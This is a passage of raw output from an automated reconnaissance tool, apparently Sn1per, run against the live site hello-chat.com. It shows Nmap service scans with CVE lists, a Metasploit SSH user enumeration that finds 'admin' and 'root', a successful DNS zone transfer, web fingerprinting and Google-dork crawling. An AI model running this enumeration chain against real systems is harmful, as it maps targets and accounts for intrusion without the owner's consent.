1956| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
1957| CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
1958| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
1959| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
1960| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
1961|_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
1962Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1963Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Adtran 424RG FTTH gateway (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%)
1964No exact OS matches for host (test conditions non-ideal).
1965Uptime guess: 38.031 days (since Sun Feb 9 19:12:11 2020)
1966Network Distance: 15 hops
1967TCP Sequence Prediction: Difficulty=261 (Good luck!)
1968IP ID Sequence Generation: All zeros
1969
1970TRACEROUTE (using port 22/tcp)
1971HOP RTT ADDRESS
19721 135.08 ms 10.203.41.1
19732 ...
19743 135.71 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
19754 135.15 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
19765 140.93 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
19776 163.11 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
19787 169.02 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
19798 238.48 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
19809 233.18 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
198110 240.71 ms be3628.ccr42.jfk02.atlas.cogentco.com (154.54.27.169)
198211 238.91 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
198312 ... 14
198415 240.78 ms 199.38.245.243
1985
1986NSE: Script Post-scanning.
1987Initiating NSE at 20:56
1988Completed NSE at 20:56, 0.00s elapsed
1989Initiating NSE at 20:56
1990Completed NSE at 20:56, 0.00s elapsed
1991#################################################################################################################################
1992USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
1993RHOSTS => hello-chat.com
1994RHOST => hello-chat.com
1995[*] 199.38.245.243:22 - SSH - Using malformed packet technique
1996[*] 199.38.245.243:22 - SSH - Starting scan
1997[+] 199.38.245.243:22 - SSH - User 'admin' found
1998[-] 199.38.245.243:22 - SSH - User 'administrator' not found
1999[-] 199.38.245.243:22 - SSH - User 'anonymous' not found
2000[-] 199.38.245.243:22 - SSH - User 'backup' not found
2001[-] 199.38.245.243:22 - SSH - User 'bee' not found
2002[-] 199.38.245.243:22 - SSH - User 'ftp' not found
2003[-] 199.38.245.243:22 - SSH - User 'guest' not found
2004[-] 199.38.245.243:22 - SSH - User 'GUEST' not found
2005[-] 199.38.245.243:22 - SSH - User 'info' not found
2006[-] 199.38.245.243:22 - SSH - User 'mail' not found
2007[-] 199.38.245.243:22 - SSH - User 'mailadmin' not found
2008[-] 199.38.245.243:22 - SSH - User 'msfadmin' not found
2009[-] 199.38.245.243:22 - SSH - User 'mysql' not found
2010[-] 199.38.245.243:22 - SSH - User 'nobody' not found
2011[-] 199.38.245.243:22 - SSH - User 'oracle' not found
2012[-] 199.38.245.243:22 - SSH - User 'owaspbwa' not found
2013[-] 199.38.245.243:22 - SSH - User 'postfix' not found
2014[-] 199.38.245.243:22 - SSH - User 'postgres' not found
2015[-] 199.38.245.243:22 - SSH - User 'private' not found
2016[-] 199.38.245.243:22 - SSH - User 'proftpd' not found
2017[-] 199.38.245.243:22 - SSH - User 'public' not found
2018[+] 199.38.245.243:22 - SSH - User 'root' found
2019[-] 199.38.245.243:22 - SSH - User 'superadmin' not found
2020[-] 199.38.245.243:22 - SSH - User 'support' not found
2021[-] 199.38.245.243:22 - SSH - User 'sys' not found
2022[-] 199.38.245.243:22 - SSH - User 'system' not found
2023[-] 199.38.245.243:22 - SSH - User 'systemadmin' not found
2024[-] 199.38.245.243:22 - SSH - User 'systemadministrator' not found
2025[-] 199.38.245.243:22 - SSH - User 'test' not found
2026[-] 199.38.245.243:22 - SSH - User 'tomcat' not found
2027[-] 199.38.245.243:22 - SSH - User 'user' not found
2028[-] 199.38.245.243:22 - SSH - User 'webmaster' not found
2029[-] 199.38.245.243:22 - SSH - User 'www-data' not found
2030[-] 199.38.245.243:22 - SSH - User 'Fortimanager_Access' not found
2031[*] Scanned 1 of 1 hosts (100% complete)
2032[*] Auxiliary module execution completed
2033#################################################################################################################################
2034Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:57 EDT
2035NSE: Loaded 55 scripts for scanning.
2036NSE: Script Pre-scanning.
2037Initiating NSE at 20:57
2038Completed NSE at 20:57, 0.00s elapsed
2039Initiating NSE at 20:57
2040Completed NSE at 20:57, 0.00s elapsed
2041Initiating Parallel DNS resolution of 1 host. at 20:57
2042Completed Parallel DNS resolution of 1 host. at 20:57, 0.02s elapsed
2043Initiating SYN Stealth Scan at 20:57
2044Scanning hello-chat.com (199.38.245.243) [1 port]
2045Discovered open port 25/tcp on 199.38.245.243
2046Completed SYN Stealth Scan at 20:57, 0.28s elapsed (1 total ports)
2047Initiating Service scan at 20:57
2048Scanning 1 service on hello-chat.com (199.38.245.243)
2049Completed Service scan at 20:57, 0.52s elapsed (1 service on 1 host)
2050Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
2051Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
2052Initiating Traceroute at 20:57
2053Completed Traceroute at 20:57, 3.17s elapsed
2054Initiating Parallel DNS resolution of 11 hosts. at 20:57
2055Completed Parallel DNS resolution of 11 hosts. at 20:57, 0.80s elapsed
2056NSE: Script scanning 199.38.245.243.
2057Initiating NSE at 20:57
2058Completed NSE at 20:57, 1.22s elapsed
2059Initiating NSE at 20:57
2060Completed NSE at 20:57, 0.00s elapsed
2061Nmap scan report for hello-chat.com (199.38.245.243)
2062Host is up (0.24s latency).
2063
2064PORT STATE SERVICE VERSION
206525/tcp open smtp Exim smtpd 4.92
2066|_smtp-commands: SMTP EHLO hello-chat.com: failed to receive data: connection closed
2067| smtp-enum-users:
2068|_ SMTP EHLO hello-chat.com: failed to receive data: connection closed
2069|_smtp-open-relay: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
2070| smtp-vuln-cve2010-4344:
2071|_ The SMTP server is not Exim: NOT VULNERABLE
2072| vulners:
2073| cpe:/a:exim:exim:4.92:
2074| CVE-2019-13917 10.0 https://vulners.com/cve/CVE-2019-13917
2075|_ CVE-2019-16928 7.5 https://vulners.com/cve/CVE-2019-16928
2076Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2077Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%), Infomir MAG-250 set-top box (89%)
2078No exact OS matches for host (test conditions non-ideal).
2079Uptime guess: 38.032 days (since Sun Feb 9 19:12:11 2020)
2080Network Distance: 16 hops
2081TCP Sequence Prediction: Difficulty=257 (Good luck!)
2082IP ID Sequence Generation: All zeros
2083Service Info: Host: server.18they.com
2084
2085TRACEROUTE (using port 25/tcp)
2086HOP RTT ADDRESS
20871 133.57 ms 10.203.41.1
20882 ...
20893 134.63 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
20904 134.63 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
20915 139.80 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
20926 158.41 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
20937 163.26 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
20948 234.71 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
20959 236.97 ms be2101.ccr32.bos01.atlas.cogentco.com (154.54.82.38)
209610 239.07 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
209711 244.98 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
209812 ... 15
209916 245.75 ms 199.38.245.243
2100
2101NSE: Script Post-scanning.
2102Initiating NSE at 20:57
2103Completed NSE at 20:57, 0.00s elapsed
2104Initiating NSE at 20:57
2105Completed NSE at 20:57, 0.00s elapsed
2106#################################################################################################################################
2107Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:00 EDT
2108NSE: Loaded 64 scripts for scanning.
2109NSE: Script Pre-scanning.
2110Initiating NSE at 21:00
2111Completed NSE at 21:00, 0.00s elapsed
2112Initiating NSE at 21:00
2113Completed NSE at 21:00, 0.00s elapsed
2114Initiating Parallel DNS resolution of 1 host. at 21:00
2115Completed Parallel DNS resolution of 1 host. at 21:00, 0.02s elapsed
2116Initiating SYN Stealth Scan at 21:00
2117Scanning hello-chat.com (199.38.245.243) [1 port]
2118Discovered open port 53/tcp on 199.38.245.243
2119Completed SYN Stealth Scan at 21:00, 0.28s elapsed (1 total ports)
2120Initiating Service scan at 21:00
2121Scanning 1 service on hello-chat.com (199.38.245.243)
2122Completed Service scan at 21:00, 6.50s elapsed (1 service on 1 host)
2123Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
2124Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
2125Initiating Traceroute at 21:00
2126Completed Traceroute at 21:00, 3.15s elapsed
2127Initiating Parallel DNS resolution of 10 hosts. at 21:00
2128Completed Parallel DNS resolution of 10 hosts. at 21:00, 0.13s elapsed
2129NSE: Script scanning 199.38.245.243.
2130Initiating NSE at 21:00
2131Completed NSE at 21:00, 10.82s elapsed
2132Initiating NSE at 21:00
2133Completed NSE at 21:00, 0.00s elapsed
2134Nmap scan report for hello-chat.com (199.38.245.243)
2135Host is up (0.24s latency).
2136
2137PORT STATE SERVICE VERSION
213853/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
2139|_dns-fuzz: Server didn't response to our probe, can't fuzz
2140| dns-nsec-enum:
2141|_ No NSEC records found
2142| dns-nsec3-enum:
2143|_ DNSSEC NSEC3 not supported
2144| dns-nsid:
2145|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
2146| dns-zone-transfer:
2147| hello-chat.com. SOA ns1.18they.com. hostmaster.hello-chat.com.
2148| hello-chat.com. MX 10 mail.hello-chat.com.
2149| hello-chat.com. TXT "v=spf1 a mx ip4:199.38.245.243 ~all"
2150| hello-chat.com. A 199.38.245.243
2151| hello-chat.com. NS ns1.18they.com.
2152| hello-chat.com. NS ns2.18they.com.
2153| ftp.hello-chat.com. A 199.38.245.243
2154| mail.hello-chat.com. A 199.38.245.243
2155| pop.hello-chat.com. A 199.38.245.243
2156| smtp.hello-chat.com. A 199.38.245.243
2157| www.hello-chat.com. A 199.38.245.243
2158|_hello-chat.com. SOA ns1.18they.com. hostmaster.hello-chat.com.
2159Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2160Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%), Infomir MAG-250 set-top box (89%)
2161No exact OS matches for host (test conditions non-ideal).
2162Uptime guess: 38.034 days (since Sun Feb 9 19:12:11 2020)
2163Network Distance: 15 hops
2164TCP Sequence Prediction: Difficulty=257 (Good luck!)
2165IP ID Sequence Generation: All zeros
2166Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
2167
2168Host script results:
2169| dns-brute:
2170| DNS Brute-force hostnames:
2171|_ www.hello-chat.com - 199.38.245.243
2172
2173TRACEROUTE (using port 53/tcp)
2174HOP RTT ADDRESS
21751 135.32 ms 10.203.41.1
21762 ...
21773 136.13 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
21784 135.94 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
21795 140.62 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
21806 159.43 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
21817 168.42 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
21828 236.11 ms be12266.ccr42.par01.atlas.cogentco.com (154.54.56.174)
21839 237.08 ms be3628.ccr42.jfk02.atlas.cogentco.com (154.54.27.169)
218410 242.13 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
218511 ... 14
218615 243.40 ms 199.38.245.243
2187
2188NSE: Script Post-scanning.
2189Initiating NSE at 21:00
2190Completed NSE at 21:00, 0.00s elapsed
2191Initiating NSE at 21:00
2192Completed NSE at 21:00, 0.00s elapsed
2193#################################################################################################################################
2194HTTP/1.1 200 OK
2195Date: Thu, 19 Mar 2020 01:06:48 GMT
2196Server: Apache/2
2197Last-Modified: Thu, 06 Feb 2020 18:17:54 GMT
2198ETag: "34b1-59dec4ab1f6c8"
2199Accept-Ranges: bytes
2200Content-Length: 13489
2201Vary: Accept-Encoding,User-Agent
2202Content-Type: text/html
2203
2204Allow:
2205#################################################################################################################################
2206
2207wig - WebApp Information Gatherer
2208
2209
2210Scanning http://hello-chat.com...
2211_________________ SITE INFO __________________
2212IP Title
2213199.38.245.243 hello-chat.com
2214
2215__________________ VERSION ___________________
2216Name Versions Type
2217Roundcube CMS
2218Apache 2 Platform
2219PHP 7.2.19 Platform
2220
2221______________________________________________
2222Time: 31.6 sec Urls: 384 Fingerprints: 40401
2223#################################################################################################################################
2224Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:01 EDT
2225NSE: Loaded 161 scripts for scanning.
2226NSE: Script Pre-scanning.
2227Initiating NSE at 21:01
2228Completed NSE at 21:01, 0.00s elapsed
2229Initiating NSE at 21:01
2230Completed NSE at 21:01, 0.00s elapsed
2231Initiating Parallel DNS resolution of 1 host. at 21:01
2232Completed Parallel DNS resolution of 1 host. at 21:01, 0.02s elapsed
2233Initiating SYN Stealth Scan at 21:01
2234Scanning hello-chat.com (199.38.245.243) [1 port]
2235Discovered open port 80/tcp on 199.38.245.243
2236Completed SYN Stealth Scan at 21:01, 0.28s elapsed (1 total ports)
2237Initiating Service scan at 21:01
2238Scanning 1 service on hello-chat.com (199.38.245.243)
2239Completed Service scan at 21:01, 15.51s elapsed (1 service on 1 host)
2240Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
2241Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
2242Initiating Traceroute at 21:02
2243Completed Traceroute at 21:02, 3.15s elapsed
2244Initiating Parallel DNS resolution of 10 hosts. at 21:02
2245Completed Parallel DNS resolution of 10 hosts. at 21:02, 0.13s elapsed
2246NSE: Script scanning 199.38.245.243.
2247Initiating NSE at 21:02
2248Completed NSE at 21:03, 90.90s elapsed
2249Initiating NSE at 21:03
2250Completed NSE at 21:03, 3.00s elapsed
2251Nmap scan report for hello-chat.com (199.38.245.243)
2252Host is up (0.24s latency).
2253
2254PORT STATE SERVICE VERSION
225580/tcp open ssl/http Apache/2
2256| http-brute:
2257|_ Path "/" does not require authentication
2258|_http-chrono: Request times for /; avg: 9078.76ms; min: 9023.67ms; max: 9221.17ms
2259|_http-csrf: Couldn't find any CSRF vulnerabilities.
2260|_http-date: Thu, 19 Mar 2020 01:08:21 GMT; +5m58s from local time.
2261|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
2262| http-dombased-xss:
2263| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=hello-chat.com
2264| Found the following indications of potential DOM based XSS:
2265|
2266| Source: window.open('','','left='+v56+',top='+v57+',width='+v5f+',height='+v60+',status=no,scrollbars=yes,toolbar=no,location=no,directories=no,menubar=no,resizable=no')
2267|_ Pages: http://hello-chat.com:80/
2268|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
2269| http-errors:
2270| Spidering limited to: maxpagecount=40; withinhost=hello-chat.com
2271| Found the following error pages:
2272|
2273| Error Code: 404
2274|_ http://hello-chat.com:80/%5c'http:/www.andypioneer.com/cgi-bin/rankem.cgi?id=hchat\'
2275|_http-feed: Couldn't find any feeds.
2276|_http-fetch: Please enter the complete path of the directory to save data in.
2277| http-headers:
2278| Date: Thu, 19 Mar 2020 01:08:19 GMT
2279| Server: Apache/2
2280| Last-Modified: Thu, 06 Feb 2020 18:17:54 GMT
2281| ETag: "34b1-59dec4ab1f6c8"
2282| Accept-Ranges: bytes
2283| Content-Length: 13489
2284| Vary: Accept-Encoding,User-Agent
2285| Connection: close
2286| Content-Type: text/html
2287|
2288|_ (Request type: HEAD)
2289|_http-jsonp-detection: Couldn't find any JSONP endpoints.
2290| http-methods:
2291| Supported Methods: GET HEAD POST
2292|_ Potentially risky methods:
2293|_http-mobileversion-checker: No mobile version detected.
2294| http-php-version: Logo query returned unknown hash ea5a23e0b33abb753bedccceba90ef14
2295|_Credits query returned unknown hash ea5a23e0b33abb753bedccceba90ef14
2296| http-security-headers:
2297| Strict_Transport_Security:
2298|_ HSTS not configured in HTTPS Server
2299|_http-server-header: Apache/2
2300| http-sitemap-generator:
2301| Directory structure:
2302| /
2303| Other: 1; png: 1
2304| Longest directory structure:
2305| Depth: 0
2306| Dir: /
2307| Total files found (by extension):
2308|_ Other: 1; png: 1
2309|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
2310|_http-title: hello-chat.com
2311| http-vhosts:
2312|_127 names had status 200
2313|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
2314|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
2315|_http-xssed: No previously reported XSS vuln.
2316Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2317Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%), Infomir MAG-250 set-top box (89%)
2318No exact OS matches for host (test conditions non-ideal).
2319Uptime guess: 38.036 days (since Sun Feb 9 19:12:10 2020)
2320Network Distance: 15 hops
2321TCP Sequence Prediction: Difficulty=261 (Good luck!)
2322IP ID Sequence Generation: All zeros
2323
2324TRACEROUTE (using port 80/tcp)
2325HOP RTT ADDRESS
23261 134.22 ms 10.203.41.1
23272 ...
23283 131.79 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
23294 131.77 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
23305 138.06 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
23316 155.88 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
23327 164.32 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
23338 242.37 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
23349 240.14 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
233510 236.19 ms be3471.ccr41.jfk02.atlas.cogentco.com (154.54.40.154)
233611 ... 14
233715 242.80 ms 199.38.245.243
2338
2339NSE: Script Post-scanning.
2340Initiating NSE at 21:03
2341Completed NSE at 21:03, 0.00s elapsed
2342Initiating NSE at 21:03
2343Completed NSE at 21:03, 0.00s elapsed
2344#################################################################################################################################
2345------------------------------------------------------------------------------------------------------------------------
2346
2347[ ! ] Starting SCANNER INURLBR 2.1 at [18-03-2020 21:12:23]
2348[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
2349It is the end user's responsibility to obey all applicable local, state and federal laws.
2350Developers assume no liability and are not responsible for any misuse or damage caused by this program
2351
2352[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/hello-chat.com/output/inurlbr-hello-chat.com ]
2353[ INFO ][ DORK ]::[ site:hello-chat.com ]
2354[ INFO ][ SEARCHING ]:: {
2355[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.bz ]
2356
2357[ INFO ][ SEARCHING ]::
2358-[:::]
2359[ INFO ][ ENGINE ]::[ GOOGLE API ]
2360
2361[ INFO ][ SEARCHING ]::
2362-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
2363[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.sk ID: 006748068166572874491:55ez0c3j3ey ]
2364
2365[ INFO ][ SEARCHING ]::
2366-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
2367
2368[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
2369
2370
2371 _[ - ]::--------------------------------------------------------------------------------------------------------------
2372|_[ + ] [ 0 / 100 ]-[21:12:43] [ - ]
2373|_[ + ] Target:: [ http://www.hello-chat.com/ ]
2374|_[ + ] Exploit::
2375|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2376|_[ + ] More details:: / - / , ISP:
2377|_[ + ] Found:: UNIDENTIFIED
2378
2379 _[ - ]::--------------------------------------------------------------------------------------------------------------
2380|_[ + ] [ 1 / 100 ]-[21:12:45] [ - ]
2381|_[ + ] Target:: [ http://hello-chat.com/rank1004.html ]
2382|_[ + ] Exploit::
2383|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2384|_[ + ] More details:: / - / , ISP:
2385|_[ + ] Found:: UNIDENTIFIED
2386
2387 _[ - ]::--------------------------------------------------------------------------------------------------------------
2388|_[ + ] [ 2 / 100 ]-[21:12:47] [ - ]
2389|_[ + ] Target:: [ http://hello-chat.com/rank1003.html ]
2390|_[ + ] Exploit::
2391|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2392|_[ + ] More details:: / - / , ISP:
2393|_[ + ] Found:: UNIDENTIFIED
2394
2395 _[ - ]::--------------------------------------------------------------------------------------------------------------
2396|_[ + ] [ 3 / 100 ]-[21:12:49] [ - ]
2397|_[ + ] Target:: [ http://hello-chat.com/rank1002.html ]
2398|_[ + ] Exploit::
2399|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2400|_[ + ] More details:: / - / , ISP:
2401|_[ + ] Found:: UNIDENTIFIED
2402
2403 _[ - ]::--------------------------------------------------------------------------------------------------------------
2404|_[ + ] [ 4 / 100 ]-[21:12:52] [ - ]
2405|_[ + ] Target:: [ http://hello-chat.com/rank100.html?139 ]
2406|_[ + ] Exploit::
2407|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2408|_[ + ] More details:: / - / , ISP:
2409|_[ + ] Found:: UNIDENTIFIED
2410
2411 _[ - ]::--------------------------------------------------------------------------------------------------------------
2412|_[ + ] [ 5 / 100 ]-[21:12:54] [ - ]
2413|_[ + ] Target:: [ http://hello-chat.com/rank100.html?502 ]
2414|_[ + ] Exploit::
2415|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2416|_[ + ] More details:: / - / , ISP:
2417|_[ + ] Found:: UNIDENTIFIED
2418
2419 _[ - ]::--------------------------------------------------------------------------------------------------------------
2420|_[ + ] [ 6 / 100 ]-[21:12:57] [ - ]
2421|_[ + ] Target:: [ http://hello-chat.com/rank100.html?421 ]
2422|_[ + ] Exploit::
2423|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2424|_[ + ] More details:: / - / , ISP:
2425|_[ + ] Found:: UNIDENTIFIED
2426
2427 _[ - ]::--------------------------------------------------------------------------------------------------------------
2428|_[ + ] [ 7 / 100 ]-[21:13:00] [ - ]
2429|_[ + ] Target:: [ http://hello-chat.com/rank100.html?301 ]
2430|_[ + ] Exploit::
2431|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2432|_[ + ] More details:: / - / , ISP:
2433|_[ + ] Found:: UNIDENTIFIED
2434
2435 _[ - ]::--------------------------------------------------------------------------------------------------------------
2436|_[ + ] [ 8 / 100 ]-[21:13:02] [ - ]
2437|_[ + ] Target:: [ http://hello-chat.com/rank100.html?78 ]
2438|_[ + ] Exploit::
2439|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2440|_[ + ] More details:: / - / , ISP:
2441|_[ + ] Found:: UNIDENTIFIED
2442
2443 _[ - ]::--------------------------------------------------------------------------------------------------------------
2444|_[ + ] [ 9 / 100 ]-[21:13:05] [ - ]
2445|_[ + ] Target:: [ http://hello-chat.com/rank100.html?265 ]
2446|_[ + ] Exploit::
2447|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2448|_[ + ] More details:: / - / , ISP:
2449|_[ + ] Found:: UNIDENTIFIED
2450
2451 _[ - ]::--------------------------------------------------------------------------------------------------------------
2452|_[ + ] [ 10 / 100 ]-[21:13:07] [ - ]
2453|_[ + ] Target:: [ http://hello-chat.com/rank100.html?408 ]
2454|_[ + ] Exploit::
2455|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2456|_[ + ] More details:: / - / , ISP:
2457|_[ + ] Found:: UNIDENTIFIED
2458
2459 _[ - ]::--------------------------------------------------------------------------------------------------------------
2460|_[ + ] [ 11 / 100 ]-[21:13:10] [ - ]
2461|_[ + ] Target:: [ http://hello-chat.com/rank100.html?389 ]
2462|_[ + ] Exploit::
2463|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2464|_[ + ] More details:: / - / , ISP:
2465|_[ + ] Found:: UNIDENTIFIED
2466
2467 _[ - ]::--------------------------------------------------------------------------------------------------------------
2468|_[ + ] [ 12 / 100 ]-[21:13:13] [ - ]
2469|_[ + ] Target:: [ http://hello-chat.com/rank100.html?79 ]
2470|_[ + ] Exploit::
2471|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2472|_[ + ] More details:: / - / , ISP:
2473|_[ + ] Found:: UNIDENTIFIED
2474
2475 _[ - ]::--------------------------------------------------------------------------------------------------------------
2476|_[ + ] [ 13 / 100 ]-[21:13:15] [ - ]
2477|_[ + ] Target:: [ http://hello-chat.com/rank100.html?218 ]
2478|_[ + ] Exploit::
2479|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2480|_[ + ] More details:: / - / , ISP:
2481|_[ + ] Found:: UNIDENTIFIED
2482
2483 _[ - ]::--------------------------------------------------------------------------------------------------------------
2484|_[ + ] [ 14 / 100 ]-[21:13:18] [ - ]
2485|_[ + ] Target:: [ http://hello-chat.com/rank100.html?405 ]
2486|_[ + ] Exploit::
2487|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2488|_[ + ] More details:: / - / , ISP:
2489|_[ + ] Found:: UNIDENTIFIED
2490
2491 _[ - ]::--------------------------------------------------------------------------------------------------------------
2492|_[ + ] [ 15 / 100 ]-[21:13:21] [ - ]
2493|_[ + ] Target:: [ http://hello-chat.com/rank100.html?419 ]
2494|_[ + ] Exploit::
2495|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2496|_[ + ] More details:: / - / , ISP:
2497|_[ + ] Found:: UNIDENTIFIED
2498
2499 _[ - ]::--------------------------------------------------------------------------------------------------------------
2500|_[ + ] [ 16 / 100 ]-[21:13:23] [ - ]
2501|_[ + ] Target:: [ http://hello-chat.com/rank100.html?123 ]
2502|_[ + ] Exploit::
2503|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2504|_[ + ] More details:: / - / , ISP:
2505|_[ + ] Found:: UNIDENTIFIED
2506
2507 _[ - ]::--------------------------------------------------------------------------------------------------------------
2508|_[ + ] [ 17 / 100 ]-[21:13:26] [ - ]
2509|_[ + ] Target:: [ http://hello-chat.com/rank100.html?344 ]
2510|_[ + ] Exploit::
2511|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2512|_[ + ] More details:: / - / , ISP:
2513|_[ + ] Found:: UNIDENTIFIED
2514
2515 _[ - ]::--------------------------------------------------------------------------------------------------------------
2516|_[ + ] [ 18 / 100 ]-[21:13:28] [ - ]
2517|_[ + ] Target:: [ http://hello-chat.com/rank100.html?15 ]
2518|_[ + ] Exploit::
2519|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
2520|_[ + ] More details:: / - / , ISP:
2521|_[ + ] Found:: UNIDENTIFIED
2522
2523 _[ - ]::--------------------------------------------------------------------------------------------------------------
2524|_[ + ] [ 19 / 100 ]-[21:13:31] [ - ]
2525|_[ + ] Target:: [ http://hello-chat.com/rank100.html?417 ]
2526|_[ + ] Exploit::
